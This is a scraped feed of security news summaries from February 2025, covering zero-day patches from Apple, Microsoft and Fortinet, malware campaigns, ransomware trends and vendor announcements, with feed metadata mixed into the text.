DeepTempo Completes BNY Ascent Program to Advance AI-Driven Cybersecurity Innovation Company collaborates with BNY on deep-learning solution for advanced threat protection - Business News]]> 2025-02-12T08:36:11+00:00 https://www.globalsecuritymag.fr/deeptempo-announced-that-it-has-completed-the-bny-ascent-program.html www.secnews.physaphae.fr/article.php?IdArticle=8648169 False Threat None 3.0000000000000000 Krebs on Security - Chercheur Américain Microsoft Patch Tuesday, February 2025 Edition Microsoft today issued security updates to fix at least 56 vulnerabilities in its Windows operating systems and supported software, including two zero-day flaws that are being actively exploited.]]> 2025-02-12T04:58:37+00:00 https://krebsonsecurity.com/2025/02/microsoft-patch-tuesday-february-2025-edition/ www.secnews.physaphae.fr/article.php?IdArticle=8648151 False Vulnerability,Threat None 2.0000000000000000 CyberScoop - scoopnewsgroup.com special Cyber U.S. adversaries increasingly turning to cybercriminals and their malware for help A Google Threat Intelligence Group report notes that Russia in particular has been doing this since the Ukraine war began.

>A Google Threat Intelligence Group report notes that Russia in particular has been doing this since the Ukraine war began. ]]> 2025-02-12T00:01:00+00:00 https://cyberscoop.com/u-s-adversaries-increasingly-turning-to-cybercriminals-and-their-malware-for-help/ www.secnews.physaphae.fr/article.php?IdArticle=8648140 False Malware,Threat None 3.0000000000000000 Dark Reading - Informationweek Branch Apple Releases Urgent Patch for USB Vulnerability The vulnerability could allow a threat actor to disable the security feature on a locked device and gain access to user data.]]> 2025-02-11T21:41:57+00:00 https://www.darkreading.com/endpoint-security/apple-releases-urgent-patch-usb-vulnerability www.secnews.physaphae.fr/article.php?IdArticle=8648125 False Vulnerability,Threat None 3.0000000000000000 Techworm - News Apple Patches Critical iOS Zero-Day CVE-2025-24200 1),(2)] published on Monday. The Cupertino giant has credited security researcher Bill Marczak of The Citizen Lab at The University of Toronto\'s Munk School for discovering and reporting the vulnerability to Apple. The CVE-2025-24200 vulnerability affected a broad range of Apple devices, including: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 7th generation and later, and iPad mini 5th generation and later iPad Pro 12.9-inch 2nd generation, iPad Pro 10.5-inch, and iPad 6th generation Apple has resolved the vulnerability above by releasing software updates - iOS 18.3.1, iPadOS 18.3.1, and iPadOS 17.7.5 - with improved memory management. While Apple has not provided any information on how the above vulnerability was exploited, it has strongly urged its iOS and iPadOS users to immediately update their devices to the latest versions to mitigate potential security threats. Further, enable automatic updates to ensure you receive future patches on your devices without delay. Avoid clicking on suspicious links and only download apps from trusted sources to reduce the risk of vulnerabilities. For software updates on iPhone or iPad, go to Settings > General > Software Update > Check for the update and install.

On Monday, Apple rolled out emergency security updates to fix a critical zero-day vulnerability in iOS and iPadOS that was actively exploited]]> 2025-02-11T20:40:58+00:00 https://www.techworm.net/2025/02/apple-patch-critical-ios-zero-day-cve-2025-24200.html www.secnews.physaphae.fr/article.php?IdArticle=8648064 False Tool,Vulnerability,Threat,Mobile None 3.0000000000000000 DarkTrace - DarkTrace: AI bases detection Defending Against Living-off-the-Land Attacks: Anomaly Detection in Action Discover how Darktrace detected and responded to cyberattacks using Living-off-the-Land (LOTL) tactics to exploit trusted services and tools on customer networks.]]> 2025-02-11T20:31:47+00:00 https://darktrace.com/blog/defending-against-living-off-the-land-attacks-anomaly-detection-in-action www.secnews.physaphae.fr/article.php?IdArticle=8648119 False Tool,Threat None 3.0000000000000000 Mandiant - Blog Sécu de Mandiant Cybercrime: A Multifaceted National Security Threat 2025-02-11T20:00:00+00:00 https://cloud.google.com/blog/topics/threat-intelligence/cybercrime-multifaceted-national-security-threat/ www.secnews.physaphae.fr/article.php?IdArticle=8648141 False Ransomware,Malware,Tool,Vulnerability,Threat,Legislation,Medical,Cloud,Technical APT 41,APT 38,APT 29,APT 43,APT 44 3.0000000000000000 IndustrialCyber - cyber risk firms for industrial Samoa warns of APT40 hackers targeting organizations in Blue Pacific region, urges immediate action The Government of Samoa issued an advisory detailing the activities of the cyber threat group APT40 and the... ]]> 2025-02-11T15:50:20+00:00 https://industrialcyber.co/ransomware/samoa-warns-of-apt40-hackers-targeting-organizations-in-blue-pacific-region-urges-immediate-action/ www.secnews.physaphae.fr/article.php?IdArticle=8648066 False Threat None 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) Threat Actors Exploit ClickFix to Deploy NetSupport RAT in Latest Cyber Attacks Threat actors have observed the increasingly common ClickFix technique to deliver a remote access trojan named NetSupport RAT since early January 2025. NetSupport RAT, typically propagated via bogus websites and fake browser updates, grants attackers full control over the victim\'s host, allowing them to monitor the device\'s screen in real-time, control the keyboard and mouse, upload and download]]> 2025-02-11T15:25:00+00:00 https://thehackernews.com/2025/02/threat-actors-exploit-clickfix-to.html www.secnews.physaphae.fr/article.php?IdArticle=8648013 False Threat None 3.0000000000000000 The State of Security - Magazine Américain VERT Threat Alert: February 2025 Patch Tuesday Analysis Today\'s VERT Alert addresses Microsoft\'s February 2025 Security Updates. VERT is actively working on coverage for these vulnerabilities and expects to ship ASPL-1143 as soon as coverage is completed. In-The-Wild & Disclosed CVEs CVE-2025-21391 A vulnerability in Windows Storage could lead to elevation of privilege, however, it is important to note that this would not give complete access to the file system. Instead, it only allows attackers to delete files they wouldn\'t otherwise have permission to remove. Microsoft has reported this vulnerability as Exploitation Detected. CVE-2025-21418 A...]]> 2025-02-11T14:28:37+00:00 https://www.tripwire.com/state-of-security/vert-threat-alert-february-2025-patch-tuesday-analysis www.secnews.physaphae.fr/article.php?IdArticle=8648118 False Vulnerability,Threat None 3.0000000000000000 Bleeping Computer - Magazine Américain Fortinet warns of new zero-day exploited to hijack firewalls Fortinet warned today that attackers are exploiting another authentication bypass zero-day bug in FortiOS and FortiProxy to hijack Fortinet firewalls and breach enterprise networks. [...]]]> 2025-02-11T13:56:13+00:00 https://www.bleepingcomputer.com/news/security/fortinet-warns-of-new-zero-day-exploited-to-hijack-firewalls/ www.secnews.physaphae.fr/article.php?IdArticle=8648107 False Vulnerability,Threat None 3.0000000000000000 Dragos - CTI Society Dragos Industrial Ransomware Analysis: Q4 2024 In the fourth quarter (October to December) of 2024, the ransomware threat landscape presented an increasingly dynamic ecosystem, with multiple... The post Dragos Industrial Ransomware Analysis: Q4 2024 first appeared on Dragos.

>In the fourth quarter (October to December) of 2024, the ransomware threat landscape presented an increasingly dynamic ecosystem, with multiple... The post Dragos Industrial Ransomware Analysis: Q4 2024 first appeared on Dragos.]]> 2025-02-11T13:00:00+00:00 https://www.dragos.com/blog/dragos-industrial-ransomware-analysis-q4-2024/ www.secnews.physaphae.fr/article.php?IdArticle=8648046 False Ransomware,Threat,Industrial None 3.0000000000000000 Cyble - CyberSecurity Firm Cyber Security Agency of Singapore Alerts Users on Active Exploitation of Zero-Day Vulnerability in Apple Products Overview The Cyber Security Agency of Singapore (CSA) has recently issued a warning regarding the active exploitation of a zero-day vulnerability (CVE-2025-24200) in a range of Apple products. This critical vulnerability is being actively targeted, and Apple has released timely security updates to address the issue. If exploited, the vulnerability could allow attackers to bypass certain security features and gain unauthorized access to sensitive data through USB connections. The vulnerability, identified as CVE-2025-24200, affects various Apple devices, including iPhones and iPads. Specifically, the issue lies in the USB Restricted Mode, a security feature designed to prevent unauthorized access to a device\'s data when it is locked. A successful attack could disable this mode, allowing an unauthenticated attacker to access the device\'s data via a USB connection, even if the device is locked. This flaw has been dubbed a "zero-day vulnerability," as it was discovered and actively exploited before a patch or security fix was made available. Apple has moved quickly to resolve the issue with new security updates released on February 10, 2025. Affected Apple Products ]]> 2025-02-11T12:46:32+00:00 https://cyble.com/blog/csa-alerts-users-of-cve-2025-24200/ www.secnews.physaphae.fr/article.php?IdArticle=8648036 False Vulnerability,Threat,Mobile None 4.0000000000000000 IndustrialCyber - cyber risk firms for industrial Silobreaker, Health-ISAC partner; offer members free trial access to its threat intelligence platform Silobreaker announced on Tuesday its partnership with Health Information Sharing and Analysis Center (Health-ISAC) as a Community Services...

>Silobreaker announced on Tuesday its partnership with Health Information Sharing and Analysis Center (Health-ISAC) as a Community Services... ]]> 2025-02-11T12:41:56+00:00 https://industrialcyber.co/news/silobreaker-health-isac-partner-offer-members-free-trial-access-to-its-threat-intelligence-platform/ www.secnews.physaphae.fr/article.php?IdArticle=8648043 False Threat None 3.0000000000000000 Cyble - CyberSecurity Firm EFCC Witness Exposes Shocking Details of Cyber Terrorism and Internet Fraud Scheme Overview In a highly anticipated trial on February 7, 2025, Rowland Turaki, a former employee of the accused, Xiao Hong Will, a Chinese national, took the stand as the first prosecution witness in the ongoing case concerning alleged cyber terrorism and internet fraud. The trial, which is being heard at the Federal High Court in Ikoyi, Lagos, is centered on Xiao Hong Will and his company, Genting International Co. Limited, both facing serious charges related to cybercrimes, identity theft, and fraud. The witness, who was studying cybersecurity at the time, described in vivid detail how his employers instructed him to disguise himself as a woman to gain the trust of potential clients for fraudulent schemes. According to Turaki, he was employed by Genting International, a company allegedly linked to a network of cybercriminals engaged in elaborate internet fraud operations. The company is accused of using deceptive tactics, including employing Nigerian youths for identity theft and cyber-terrorism activities aimed at destabilizing Nigeria\'s constitutional structure. The Arrest of Xiao Hong Will Xiao Hong Will, arrested during the EFCC\'s "Eagle Flush Operation" in Lagos on December 19, 2024, is charged with a series of crimes under the Cybercrimes (Prohibition, Prevention, Etc.) Act, 2015 (As Amended, 2024). He and his company allegedly facilitated the exploitation of victims by using fraudulent identities and cryptocurrency schemes to gain financial advantage. The prosecution has charged Hong Will and Genting International with using Nigerian youths to create fake personas, potential]]> 2025-02-11T11:23:25+00:00 https://cyble.com/blog/efcc-witness-details-cyber-terrorism/ www.secnews.physaphae.fr/article.php?IdArticle=8648026 False Threat,Legislation,Medical,Technical None 3.0000000000000000 Global Security Mag - Site de news francais Threat Landscape Almond : la menace cyber franchit un nouveau cap Investigations]]> 2025-02-11T11:07:51+00:00 https://www.globalsecuritymag.fr/threat-landscape-almond-la-menace-cyber-franchit-un-nouveau-cap.html www.secnews.physaphae.fr/article.php?IdArticle=8648014 False Threat None 3.0000000000000000 InfoSecurity Mag - InfoSecurity Magazine Apple Mitigates “Extremely Sophisticated” Zero-Day Exploit Apple has patched a zero-day vulnerability being exploited in targeted attacks]]> 2025-02-11T10:30:00+00:00 https://www.infosecurity-magazine.com/news/apple-update-extremely/ www.secnews.physaphae.fr/article.php?IdArticle=8648021 False Vulnerability,Threat None 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) Apple Patches Actively Exploited iOS Zero-Day CVE-2025-24200 in Emergency Update Apple on Monday released out-of-band security updates to address a security flaw in iOS and iPadOS that it said has been exploited in the wild. Assigned the CVE identifier CVE-2025-24200, the vulnerability has been described as an authorization issue that could make it possible for a malicious actor to disable USB Restricted Mode on a locked device as part of a cyber physical attack. This]]> 2025-02-11T10:02:00+00:00 https://thehackernews.com/2025/02/apple-patches-actively-exploited-ios.html www.secnews.physaphae.fr/article.php?IdArticle=8647977 False Vulnerability,Threat None 3.0000000000000000 Dark Reading - Informationweek Branch XE Group Shifts From Card Skimming to Supply Chain Attacks The likely Vietnam-based threat actor has been using two zero-days in VeraCore\'s warehouse management software in some of its latest cyberattacks.]]> 2025-02-10T21:58:30+00:00 https://www.darkreading.com/cyber-risk/xe-group-shifts-card-skimming-supply-chain-attacks www.secnews.physaphae.fr/article.php?IdArticle=8647943 False Threat None 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) Hackers Exploit Google Tag Manager to Deploy Credit Card Skimmers on Magento Stores Threat actors have been observed leveraging Google Tag Manager (GTM) to deliver credit card skimmer malware targeting Magento-based e-commerce websites. Website security company Sucuri said the code, while appearing to be a typical GTM and Google Analytics script used for website analytics and advertising purposes, contains an obfuscated backdoor capable of providing attackers with persistent]]> 2025-02-10T20:46:00+00:00 https://thehackernews.com/2025/02/hackers-exploit-google-tag-manager-to.html www.secnews.physaphae.fr/article.php?IdArticle=8647894 False Malware,Threat None 3.0000000000000000 IndustrialCyber - cyber risk firms for industrial Xona Systems, Nozomi Networks boost critical infrastructure security with access management, threat detection Xona Systems, provider of secure access management solutions for critical infrastructure, announced on Monday the integration of the... ]]> 2025-02-10T19:41:42+00:00 https://industrialcyber.co/news/xona-systems-nozomi-networks-boost-critical-infrastructure-security-with-access-management-threat-detection/ www.secnews.physaphae.fr/article.php?IdArticle=8647918 False Threat None 2.0000000000000000 TechRepublic - Security News US Australians Hit With One Cyber Attack Every Second in 2024 Australia saw a record surge in cyber attacks in 2024, with data breaches escalating. Experts warn of rising risks as hackers may exploit AI-driven tactics.]]> 2025-02-10T17:33:44+00:00 https://www.techrepublic.com/article/australia-one-cyber-attack-every-second/ www.secnews.physaphae.fr/article.php?IdArticle=8647895 False Threat None 3.0000000000000000 DarkTrace - DarkTrace: AI bases detection From Hype to Reality: How AI is Transforming Cybersecurity Practices AI hype is everywhere, but not many vendors are getting specific. Darktrace\'s multi-layered AI combines various machine learning techniques for behavioral analytics, real-time threat detection, investigation, and autonomous response.]]> 2025-02-10T16:06:31+00:00 https://darktrace.com/blog/how-ai-is-transforming-cybersecurity-practices www.secnews.physaphae.fr/article.php?IdArticle=8647876 False Threat None 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) DragonRank Exploits IIS Servers with BadIIS Malware for SEO Fraud and Gambling Redirects Threat actors have been observed targeting Internet Information Services (IIS) servers in Asia as part of a search engine optimization (SEO) manipulation campaign designed to install BadIIS malware. "It is likely that the campaign is financially motivated since redirecting users to illegal gambling websites shows that attackers deploy BadIIS for profit," Trend Micro researchers Ted Lee and]]> 2025-02-10T15:14:00+00:00 https://thehackernews.com/2025/02/dragonrank-exploits-iis-servers-with.html www.secnews.physaphae.fr/article.php?IdArticle=8647834 False Malware,Threat,Prediction None 3.0000000000000000 Dark Reading - Informationweek Branch Analyst Burnout Is an Advanced Persistent Threat For too long, we\'ve treated our analysts as mere cogs in a machine, expecting them to conform to the limitations of our tools and processes. It\'s time to revolutionize security operations.]]> 2025-02-10T15:00:00+00:00 https://www.darkreading.com/cybersecurity-operations/analyst-burnout-is-advanced-persistent-threat www.secnews.physaphae.fr/article.php?IdArticle=8647914 False Tool,Threat None 3.0000000000000000 Checkpoint Research - Fabricant Materiel Securite 10th February – Threat Intelligence Report For the latest discoveries in cyber research for the week of 10th February, please download our Threat Intelligence Bulletin. TOP ATTACKS AND BREACHES Grubhub, the US-based online food ordering and delivery platform, suffered a data breach due to unauthorized access through a compromised third-party service provider\'s account. The incident exposed personal details of customers, drivers, […]

>For the latest discoveries in cyber research for the week of 10th February, please download our Threat Intelligence Bulletin. TOP ATTACKS AND BREACHES Grubhub, the US-based online food ordering and delivery platform, suffered a data breach due to unauthorized access through a compromised third-party service provider\'s account. The incident exposed personal details of customers, drivers, […] ]]> 2025-02-10T13:53:25+00:00 https://research.checkpoint.com/2025/10th-february-threat-intelligence-report/ www.secnews.physaphae.fr/article.php?IdArticle=8647861 False Data Breach,Threat None 3.0000000000000000 ProofPoint - Cyber Firms Emerging Threats Updates Improve Metadata, Including MITRE ATT&CK Tags 2025-02-10T13:21:52+00:00 https://www.proofpoint.com/us/blog/threat-insight/emerging-threats-updates-improve-metadata-including-mitre-attck-tags www.secnews.physaphae.fr/article.php?IdArticle=8647970 False Malware,Tool,Vulnerability,Threat None 2.0000000000000000 IndustrialCyber - cyber risk firms for industrial DHS warns Chinese-made internet cameras pose espionage threat to US critical infrastructure The U.S. Department of Homeland Security (DHS) has reportedly issued a bulletin warning that internet-connected cameras manufactured in...

>The U.S. Department of Homeland Security (DHS) has reportedly issued a bulletin warning that internet-connected cameras manufactured in... ]]> 2025-02-10T12:41:21+00:00 https://industrialcyber.co/cisa/dhs-warns-chinese-made-internet-cameras-pose-espionage-threat-to-us-critical-infrastructure/ www.secnews.physaphae.fr/article.php?IdArticle=8647848 False Threat None 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) XE Hacker Group Exploits VeraCore Zero-Day to Deploy Persistent Web Shells Threat actors have been observed exploiting multiple security flaws in various software products, including Progress Telerik UI for ASP.NET AJAX and Advantive VeraCore, to drop reverse shells and web shells, and maintain persistent remote access to compromised systems. The zero-day exploitation of security flaws in VeraCore has been attributed to a threat actor known as XE Group, a cybercrime]]> 2025-02-10T10:44:00+00:00 https://thehackernews.com/2025/02/xe-hacker-group-exploits-veracore-zero.html www.secnews.physaphae.fr/article.php?IdArticle=8647796 False Vulnerability,Threat None 3.0000000000000000 InfoSecurity Mag - InfoSecurity Magazine Europol Warns Financial Sector of “Imminent” Quantum Threat Europol has urged the financial sector to prioritize quantum-safe cryptography]]> 2025-02-10T09:45:00+00:00 https://www.infosecurity-magazine.com/news/europol-warns-financial-sector/ www.secnews.physaphae.fr/article.php?IdArticle=8647817 False Threat None 3.0000000000000000 The State of Security - Magazine Américain “Quishing” - The Emerging Threat of Fake QR Codes QR codes have revolutionized digital interactions, offering quick access to websites and services and adding a layer of security to many apps. These quick and seemingly innocent codes are everywhere - however, their widespread use has made them a prime target for scammers. The corruption QR codes leaves everyone vulnerable. However, there are simple methods to protect against this threat. What Is “Quishing”? In quishing attacks, scammers use fake QR codes to redirect people to fraudulent websites when the code is scanned. This enables the criminal to download information and profiles from the...]]> 2025-02-10T03:03:17+00:00 https://www.tripwire.com/state-of-security/quishing-emerging-threat-fake-qr-codes www.secnews.physaphae.fr/article.php?IdArticle=8647807 False Threat None 3.0000000000000000 The State of Security - Magazine Américain Key Takeaways from the NCSC Annual Review 2024 In early December 2024, the UK\'s National Cyber Security Center (NCSC) released its eighth Annual Review. While the report\'s primary focus is to recap the NCSC\'s activities over the past year, it also offers invaluable insights into how the UK thinks about and plans to act on cybersecurity. In this article, we\'ll look at a few of its key takeaways. UK in "A Contest for Cyberspace" The overarching theme of the NCSC Annual Review 2024 is the enormous scale of the cyber threat to the UK and the government\'s increasingly serious attitude towards it. This is best exemplified in the foreword by the...]]> 2025-02-10T03:03:16+00:00 https://www.tripwire.com/state-of-security/key-takeaways-ncsc-annual-review-2024 www.secnews.physaphae.fr/article.php?IdArticle=8647808 False Threat None 3.0000000000000000 ProofPoint - Cyber Firms AI in Cybersecurity: the Good, the Bad and the Ugly 2025-02-10T01:58:04+00:00 https://www.proofpoint.com/us/blog/email-and-cloud-threats/ai-cybersecurity-revolutionizing-protection-strategies www.secnews.physaphae.fr/article.php?IdArticle=8648557 False Ransomware,Malware,Tool,Vulnerability,Threat,Prediction,Cloud None 2.0000000000000000 Techworm - News Critical Microsoft Outlook RCE Bug Actively Exploited In Attacks CVE-2024–21413 (CVSS score 9.8). This flaw results from improper input validation, which can trigger code execution when opening emails with malicious links using a vulnerable Microsoft Outlook version. Successful exploitation of this vulnerability would allow a threat actor to bypass the Office Protected View and open malicious files in editing mode rather than protected mode. It could also grant the threat actor elevated privileges, including the ability to read, write, and delete data. Microsoft addressed the CVE-2024–21413 vulnerability a year ago, cautioning that the Preview Pane could itself be an attack vector. As a result, simply viewing a malicious email within Outlook might be enough to trigger the exploit, making it exceptionally dangerous. According to Check Point, attackers exploit the vulnerability dubbed Moniker Link, a method that tricks Outlook into opening unsafe files. This allows the threat actors to bypass built-in Outlook protections for malicious links embedded in emails using the file:// protocol. The attackers can manipulate Outlook to treat malicious files as trusted resources by appending an exclamation mark followed by arbitrary text to a file URL. By inserting this exclamation mark immediately after the file extension in URLs pointing to attacker-controlled servers, along with some random text, they can deceive the system and execute malicious payloads. For example, an attacker might craft a link as shown below: CLICK ME When a victim clicks on the link, Outlook retrieves the file from the attacker’s server and runs it with elevated privileges, granting the attacker control over the system. The CVE-2024-21413 vulnerability has affected multiple Microsoft Office products, including Microsoft Office LTSC 2021, Microsoft 365 Apps for Enterprise, Microsoft Outlook 2016, and Microsoft Office 2019. In response to the active exploitation of this vulnerability, CISA has added CVE-2024-21413 to its Known Exploited Vulnerabilities (KEV) Catalog. As per the November 2021 Binding Operational Directive (BOD) 22-01, the federal agencies have been given time until February 27, 2025, to patch their systems and protect their networks against potential threats. “These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise,” the cybersecurity agency warned on Thursday. With active exploitation in the wild, CVE-2024-21413 presents a severe security risk to Outlook users. Hence, private organizations are advised to immediately apply patches and reinforce cybersecurity defenses to prevent potential breaches.

Cybersecurity firm Check Point has discovered a critical remote code execution (RCE) vulnerability in Microsoft Outlook, which is currently being exploited in active cyberattacks, posing a significant threat to organizations worldwide. This has prompted the Cybersecurity and Infrastructure Security Agency (CISA) to warn]]> 2025-02-08T14:43:36+00:00 https://www.techworm.net/2025/02/microsoft-outlook-rce-bug-exploited-attacks.html www.secnews.physaphae.fr/article.php?IdArticle=8647563 False Vulnerability,Threat None 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) Microsoft Identifies 3,000+ Publicly Disclosed ASP.NET Machine Keys Vulnerable to Code Injection Microsoft is warning of an insecure practice wherein software developers are incorporating publicly disclosed ASP.NET machine keys from publicly accessible resources, thereby putting their applications in attackers\' pathway. The tech giant\'s threat intelligence team said it observed limited activity in December 2024 that involved an unknown threat actor using a publicly available, static ASP.NET]]> 2025-02-07T16:31:00+00:00 https://thehackernews.com/2025/02/microsoft-identifies-3000-publicly.html www.secnews.physaphae.fr/article.php?IdArticle=8647404 False Threat None 3.0000000000000000 InfoSecurity Mag - InfoSecurity Magazine Malicious AI Models on Hugging Face Exploit Novel Attack Technique The technique, called nullifAI, allows the models to bypass Hugging Face\'s protective measures against malicious AI models]]> 2025-02-07T14:00:00+00:00 https://www.infosecurity-magazine.com/news/malicious-ai-models-hugging-face/ www.secnews.physaphae.fr/article.php?IdArticle=8647428 False Threat None 3.0000000000000000 Bleeping Computer - Magazine Américain Hackers exploit Cityworks RCE bug to breach Microsoft IIS servers Software vendor Trimble is warning that hackers are exploiting a Cityworks deserialization vulnerability to remotely execute commands on IIS servers and deploy Cobalt Strike beacons for initial network access. [...]]]> 2025-02-07T13:42:44+00:00 https://www.bleepingcomputer.com/news/security/hackers-exploit-cityworks-rce-bug-to-breach-microsoft-iis-servers/ www.secnews.physaphae.fr/article.php?IdArticle=8647472 False Vulnerability,Threat None 3.0000000000000000 Zataz - Magazine Francais de secu Le protocole d\'alerte ZATAZ : version 2025 La cybersécurité est cruciale dans un monde connecté. Le protocole d\'alerte ZATAZ évolue après 25 ans pour mieux contrer les menaces, avec alertes en temps réel....]]> 2025-02-07T13:35:46+00:00 https://www.zataz.com/le-protocole-dalerte-zataz-version-2025/ www.secnews.physaphae.fr/article.php?IdArticle=8647424 False Threat None 3.0000000000000000 Cyble - CyberSecurity Firm Open Graph Spoofing Toolkit: Old Exploitation Techniques Still in Use to Lure Social Media Users into Phishing Attacks The current digital landscape necessitates an approach to sharing content on social media for significant user engagement and click-through rates. This is where the Open Graph Protocol (OGP) comes into play. Developed by Facebook, Open Graph allows web developers to control how their web pages appear when shared across various platforms. Developers use specific meta tags in a webpage\'s HTML to define essential elements such as the title, description, and image that accompany shared links. Attackers have long exploited the Open Graph Protocol for malicious activities. Recently, Cyble Research and Intelligence Labs (CRIL) also observed a threat actor on a Russian underground offering a toolkit dubbed \'OG Spoof\' for similar operations. The toolkit was designed for phishing campaigns, aiming to mislead users and artificially inflate click-through rates by exploiting flaws in the Open Graph protocol. Overview The importance of Open Graph (OG) tags cannot be overstated. The OG tags enhance the visibility of content, making it appealing to a broader base of potential viewers and more likely to garner views and clicks. Figure 1: OG tags used in header

Figure 1: OG tags used in the header Several content management systems (CMS), such as WordPress and Magento, come equipped with built-in functionalities or plugins that automatically generate these tags based on the post\'s content. This automation ensures that when links are shared, they are presented in an engaging manner while accurately previewing their content. The TA released the \'OG Spoof\' kit for sale in October 2024 at a staggering USD 2,500 price and claimed that it was initially designed for their own fraudulent operations. However, as they developed advanced methods, the toolk]]> 2025-02-07T12:57:51+00:00 https://cyble.com/blog/open-graph-spoofing-toolkit/ www.secnews.physaphae.fr/article.php?IdArticle=8647415 False Malware,Vulnerability,Threat None 3.0000000000000000 Cyble - CyberSecurity Firm Critical Vulnerabilities Reported in Cyble\\'s Weekly Vulnerability Insights Overview Cyble Research & Intelligence Labs (CRIL) published their Weekly Vulnerability Insights Report to clients, covering key vulnerabilities reported from January 29 to February 4, 2025. The analysis highlights critical security flaws that have posed cyber threats to various IT infrastructures globally. Notably, the Cybersecurity and Infrastructure Security Agency (CISA) added five vulnerabilities to the Known Exploited Vulnerability (KEV) catalog. This report highlights vulnerabilities in several widely used software products and services, including Paessler PRTG Network Monitor, Microsoft .NET Framework, and Zyxel DSL devices. These vulnerabilities could impact a range of industries that rely on these systems to monitor, manage, and protect critical infrastructure. Incorporation of Vulnerabilities into the KEV Catalog CISA\'s inclusion of vulnerabilities in the KEV catalog is an important step in highlighting serious risks associated with widely deployed software. During this period, CISA added five vulnerabilities, including two dating back to 2018, that have been actively exploited and affect major IT infrastructure tools like Paessler PRTG Network Monitor. These vulnerabilities were assessed for their active exploitation and listed accordingly to ensure better protection for organizations globally. Among the newly added vulnerabilities, CVE-2018-19410 and ]]> 2025-02-07T11:44:32+00:00 https://cyble.com/blog/cybles-weekly-vulnerability-kev-catalog/ www.secnews.physaphae.fr/article.php?IdArticle=8647402 False Tool,Vulnerability,Threat,Patching,Mobile None 3.0000000000000000 Cyble - CyberSecurity Firm U.S. Ransomware Attacks Surge to Start 2025 Overview According to an analysis of Cyble threat intelligence data, U.S. ransomware attacks have surged to the start of 2025, up nearly 150% from the first five weeks of 2024. Ransomware attacks on U.S. targets have been climbing since a few organizations paid ransoms to attackers in highly publicized cases last year, making the country a more attractive target for ransomware groups. That\'s likely the main reason for the increase. Regardless of the timeframe or changes in the most active ransomware groups, U.S. ransomware attacks have increased substantially in the last year and have been climbing steadily since the fall. We\'ll examine the changing ransomware landscape in the U.S. and other frequently attacked countries and consider what changes may be in store as we approach 2025. The Effect of Ransomware Payments In the first five weeks of 2024, Cyble documented 152 ransomware attacks on U.S. targets, in line with late 2023 trends. In the first five weeks of 2025, that number soared to 378 attacks on U.S. targets, a 149% year-over-year increase. Compared to the end of 2024, attacks are up a still significant 29% so far in 2025, up from 282 in the last five weeks of the year. Perhaps owing to geographical proximity, Canada has also seen a significant increase in ransomware attacks, up from 14 in the year-ago period to 28 at the end of 2024, and nearly doubling again to 46 to start 2025. Even as North American ransomware attacks have soared, the next-most attacked regions have stayed relatively stable. France, for example, had 18 attacks to start in 2024 and has seen 19 thus far in 2025 (chart below). ]]> 2025-02-07T10:55:33+00:00 https://cyble.com/blog/u-s-ransomware-attacks-surge-to-start-2025/ www.secnews.physaphae.fr/article.php?IdArticle=8647393 False Ransomware,Tool,Vulnerability,Threat,Legislation,Prediction,Medical None 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) Hackers Exploiting SimpleHelp RMM Flaws for Persistent Access and Ransomware Threat actors have been observed exploiting recently disclosed security flaws in SimpleHelp\'s Remote Monitoring and Management (RMM) software as a precursor for what appears to be a ransomware attack. The intrusion leveraged the now-patched vulnerabilities to gain initial access and maintain persistent remote access to an unspecified target network, cybersecurity company Field Effect said in a]]> 2025-02-07T10:49:00+00:00 https://thehackernews.com/2025/02/hackers-exploit-simplehelp-rmm-flaws.html www.secnews.physaphae.fr/article.php?IdArticle=8647359 False Ransomware,Vulnerability,Threat None 3.0000000000000000 SecurityWeek - Security News Trimble Cityworks Customers Warned of Zero-Day Exploitation Trimble Cityworks is affected by a zero-day vulnerability that has been exploited in attacks involving the delivery of malware.

>Trimble Cityworks is affected by a zero-day vulnerability that has been exploited in attacks involving the delivery of malware. ]]> 2025-02-07T09:55:00+00:00 https://www.securityweek.com/trimble-cityworks-customers-warned-of-zero-day-exploitation/ www.secnews.physaphae.fr/article.php?IdArticle=8647385 False Malware,Vulnerability,Threat None 3.0000000000000000 AlienVault Lab Blog - AlienVault est un acteur de defense majeur dans les IOC A Rose by Any Other Name: Exposure Management, a Category that Evolved from Traditional Vulnerability Management 2025-02-07T07:00:00+00:00 https://levelblue.com/blogs/security-essentials/rose-exposure-management-from-traditional-vulnerability-management www.secnews.physaphae.fr/article.php?IdArticle=8647365 False Tool,Vulnerability,Threat,Patching,Mobile,Industrial,Cloud,Technical None 3.0000000000000000 InformationSecurityBuzzNews - Site de News Securite The RAT Pack Returns: ValleyRAT\\'s Devious Delivery Methods Morphisec Threat Labs has uncovered cunning new delivery techniques used by ValleyRAT, a sophisticated multi-stage malware attributed to the Silver Fox APT. The malware, which primarily targets key roles in finance, accounting, and sales, has evolved with updated tactics, techniques, and procedures (TTPs), including the reuse of URLs and the exploitation of gaming binaries for [...]]]> 2025-02-07T03:57:39+00:00 https://informationsecuritybuzz.com/valleyrats-devious-delivery-methods/ www.secnews.physaphae.fr/article.php?IdArticle=8647348 False Malware,Threat None 3.0000000000000000 Global Security Mag - Site de news francais Nationwide partners with CAPSLOCK Business News

Nationwide partners with CAPSLOCK to boost cyber skills, diversity and resilience CAPSLOCK\'s tailored programme upskills Nationwide\'s first cohort of learners to tackle both the challenging hiring and threat landscapes - Business News]]> 2025-02-06T22:23:43+00:00 https://www.globalsecuritymag.fr/nationwide-partners-with-capslock.html www.secnews.physaphae.fr/article.php?IdArticle=8647321 False Threat None 2.0000000000000000 Global Security Mag - Site de news francais CyberArk announced a new integration with SentinelOne Singularity Product Reviews

